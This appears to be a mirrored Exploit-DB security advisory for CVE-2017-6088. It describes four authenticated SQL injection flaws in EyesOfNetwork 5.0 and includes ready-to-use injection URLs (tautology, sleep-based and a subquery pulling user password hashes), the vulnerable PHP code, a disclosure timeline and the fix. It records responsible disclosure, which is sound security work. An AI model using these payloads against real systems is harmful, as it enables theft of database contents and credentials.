bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/41747.txt
Offensive Security 1f8c35c0c0 DB: 2017-03-28 
25 new exploits

Samba < 3.6.2 (x86) - Denial of Serviec (PoC)
Samba < 3.6.2 (x86) - Denial of Service (PoC)
Microsoft Visual Studio 2015 update 3 - Denial of Service
Disk Sorter Enterprise 9.5.12 - Local Buffer Overflow
Apple Safari - 'DateTimeFormat.format' Type Confusion
Apple Safari - Builtin JavaScript Allows Function.caller to be Used in Strict Mode
Apple Safari - Out-of-Bounds Read when Calling Bound Function

QNAP QTS < 4.2.4 - Domain Privilege Escalation
Internet Information Services (IIS) 6.0 WebDAV - 'ScStoragePathFromUrl' Buffer Overflow
Samba 4.5.2 - Symlink Race Permits Opening Files Outside Share Directory
Github Enterprise - Default Session Secret And Deserialization (Metasploit)

B2B Alibaba Clone Script - SQL Injection
B2B Alibaba Clone Script - 'IndustryID' Parameter SQL Injection
Just Another Video Script 1.4.3 - SQL Injection
Adult Tube Video Script - SQL Injection
Alibaba Clone Script - SQL Injection
B2B Marketplace Script 2.0 - SQL Injection
Php Real Estate Property Script - SQL Injection
Courier Tracking Software 6.0 - SQL Injection
Parcel Delivery Booking Script 1.0 - SQL Injection
Delux Same Day Delivery Script 1.0 - SQL Injection
Hotel Booking Script 1.0 - SQL Injection
Tour Package Booking 1.0 - SQL Injection
Professional Bus Booking Script - 'hid_Busid' Parameter SQL Injection
CouponPHP CMS 3.1 - 'code' Parameter SQL Injection
EyesOfNetwork (EON) 5.0 - Remote Code Execution
EyesOfNetwork (EON) 5.0 - SQL Injection
Nuxeo 6.0 / 7.1 / 7.2 / 7.3 - Remote Code Execution (Metasploit)
inoERP 0.6.1 - Cross-Site Scripting / Cross-Site Request Forgery / SQL Injection / Session Fixation
2017-03-28 05:01:16 +00:00

172 lines
No EOL
4.7 KiB
Text
Executable file
Raw Blame History

# [CVE-2017-6088] EON 5.0 Multiple SQL Injection
## Description
EyesOfNetwork ("EON") is an OpenSource network monitoring solution.
## SQL injection (authenticated)
The Eonweb code does not correctly filter arguments, allowing
authenticated users to inject arbitrary SQL requests.
**CVE ID**: CVE-2017-6088
**Access Vector**: remote
**Security Risk**: medium
**Vulnerability**: CWE-89
**CVSS Base Score**: 6.0
**CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:L
### Proof of Concept 1 (root privileges)
The following HTTP request allows an attacker (connected as
administrator) to dump the database contents using SQL injections inside
either the `bp_name` or the `display` parameter. These requests are
executed with MySQL root privileges.
```
https://eonweb.local/module/admin_bp/php/function_bp.php?action=list_process&bp_name=&display=%27or%271%27=%271
https://eonweb.local/module/admin_bp/php/function_bp.php?action=list_process&bp_name=%27or%271%27=%271&display=1
```
#### Vulnerable code
The vulnerable code can be found inside the
`module/monitoring_ged/ged_functions.php` file, line 114:
```
function list_process($bp,$display,$bdd){
$sql = "select name from bp where is_define = 1 and name!='".$bp."'
and priority = '" . $display . "'";
$req = $bdd->query($sql);
$process = $req->fetchall();
echo json_encode($process);
}
```
### Proof of Concept 2
The following HTTP request allows an attacker to dump the database
contents using SQL injections inside the `type` parameter:
```
https://eonweb.local/module/monitoring_ged/ajax.php?queue=active&type=1%27+AND+(SELECT+sleep(5))+AND+%271%27=%271&owner=&filter=equipment&search=&ok=on&warning=on&critical=on&unknown=on&daterange=&time_period=&ack_time=
```
#### Vulnerable code
The vulnerable code can be found inside the
`module/monitoring_ged/ajax.php` file, line 64:
```
if($_GET["type"] == 0){
$ged_where = "WHERE pkt_type_id!='0'";
} else {
$ged_where = "WHERE pkt_type_id='".$_GET["type"]."'";
}
$gedsql_result1=sqlrequest($database_ged,"SELECT
pkt_type_id,pkt_type_name FROM pkt_type $ged_where AND pkt_type_id<'100';");
```
### Proof of Concept 3
The following HTTP request allows an attacker to dump the database
contents using SQL injections inside the `search` parameter:
```
https://eonweb.local/module/monitoring_ged/ajax.php?queue=active&type=1&owner=&filter=equipment&search='+AND+(select+sleep(5))+AND+'1'='1&ok=on&warning=on&critical=on&unknown=on&daterange=&time_period=&ack_time=
```
#### Vulnerable code
The vulnerable code can be found inside the
`module/monitoring_ged/ged_functions.php` file, line 129.
```
if($search != ""){
$like = "";
if( substr($search, 0, 1) === '*' ){
$like .= "%";
}
$like .= trim($search, '*');
if ( substr($search, -1) === '*' ) {
$like .= "%";
}
$where_clause .= " AND $filter LIKE '$like'";
}
```
### Proof of Concept 4
The following HTTP request allows an attacker to dump the database
contents using SQL injections inside the `equipment` parameter:
```
https://eonweb.local/module/monitoring_ged/ged_actions.php?action=advancedFilterSearch&filter=(select+user_passwd+from+eonweb.users+limit
1)&queue=history
```
#### Vulnerable code
The vulnerable code can be found inside the
`module/monitoring_ged/ged_functions.php` file, line 493:
```
$gedsql_result1=sqlrequest($database_ged,"SELECT
pkt_type_id,pkt_type_name FROM pkt_type WHERE pkt_type_id!='0' AND
pkt_type_id<'100';");
while($ged_type = mysqli_fetch_assoc($gedsql_result1)){
$sql = "SELECT DISTINCT $filter FROM
".$ged_type["pkt_type_name"]."_queue_".$queue;
$results = sqlrequest($database_ged, $sql);
while($result = mysqli_fetch_array($results)){
if( !in_array($result[$filter], $datas) && $result[$filter] != "" ){
array_push($datas, $result[$filter]);
}
}
}
```
## Timeline (dd/mm/yyyy)
* 01/10/2016 : Initial discovery.
* 09/10/2016 : Fisrt contact with vendor.
* 23/10/2016 : Technical details sent to the security contact.
* 27/10/2016 : Vendor akwnoledgement and first patching attempt.
* 16/02/2017 : New tests done on release candidate 5.1. Fix confirmed.
* 26/02/2017 : 5.1 release. Waiting for 2 weeks according to our
repsonsible disclosure agreement.
* 14/03/2017 : Public disclosure.
Thank you to EON for the fast response.
## Solution
Update to version 5.1.
## Affected versions
* Version <= 5.0
## Credits
* Nicolas SERRA <n.serra@sysdream.com>
-- SYSDREAM Labs <labs@sysdream.com>
GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1
* Website: https://sysdream.com/
* Twitter: @sysdream
Reference in a new issue View git blame Copy permalink